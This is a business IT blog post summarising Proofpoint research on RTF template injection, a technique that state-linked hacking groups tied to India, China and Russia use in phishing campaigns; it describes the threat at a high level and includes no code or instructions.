An effective new technique to power phishing campaigns for spreading malware has reared its ugly head, warn cybersecurity researchers. As nation state-backed hacking groups are stealing information that is of interest to their governments. 

To clarify, using rich text format (RTF) template injections, advanced persistent threat (APT) groups working on behalf of Russian, Chinese and Indian say Cybersecurity researchers at Proofpoint.

Using RTF text file attachments in phishing emails isn’t new. But the technique is new. Hackers are finding it easier to deploy and it can be harder for antivirus software to detect. Lastly, because RTF files are part of everyday business operations, they aren’t generally set to block by default.

The hackers use the technique RTF template injection where they alter the document formatting properties of the RTF. Because you can weaponise an RTF file to retrieve remote content from a URL controlled by the attackers, it allows them to sneakily retrieve a malware payload that has been installed on the victim’s device.

That’s to say, they can open documents in Microsoft Word, which will use the malicious URL to retrieve the payload while also using Word to display the decoy document using the technique RTF template injections.

To begin the process of downloading the payload, it may require that hackers luring users into enabling editing or enabling content. But of the back of a convincing lure the process of trickery has taken place and the victim has fallen to the scheme. In other words, the right form of social engineering has happened.

So, it’s no wonder this type of technique, RTF attacks with their simplicity have become the most popular type amongst several nation-state hacking operations, since they get the same sort of results as the more complex techniques.

Sherrod DeGrippo, the vice president of threat research and detection at Proofpoint says that “despite the “Advanced” designation, if APT actors are doing their job well, they will exert the least number of resources and sophistication necessary to gain access to organisations.” And if discovered they haven’t exposed more sophisticated tools and there’s minimal disruption to their operations.

In February 2021 was the first known instance of an APT group using RTF template injections in a campaign, according to researchers.  This injection campaign was linked to Indian state interests via DoNot Team an APT group.

In addition, there have now been numerous other state-linked hacking operations using RTF injections as part of campaigns. For instance, a group Proofpoint refers to as TA423, this group is also known as Leviathan, who been using their attacking campaigns since April and are linked to China.

Meanwhile, one of their campaigns targeted Malaysian entities in the energy exploration sector in the month of September. To clarify, phishing emails were specifically designed to lure targets to unwittingly execute the payload.

After that, Gamaredon an offensive hacking group that has been linked to the Russian Federal Security Service (FSB) started their attacks uses RTF template injection documents in October. These attacks try to impersonate the Ukrainian Ministry of Defence. 

As a result, researchers warn that the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape, even if presently only a few APT groups have attempted to deploy RTF-based attacks. In other words, watch out as hackers who are financially motivated will start adopting this technique in their campaigns.

DeGrippo warns that “the ease of weaponisation in this technique will also likely attract low-end and low-sophistication actors, expanding the presence of this technique in the wild, including crimeware actors.” And that’s bad news for business.

Want insights like this in your mailbox? Join our monthly mailing list

How can we make your business better with IT?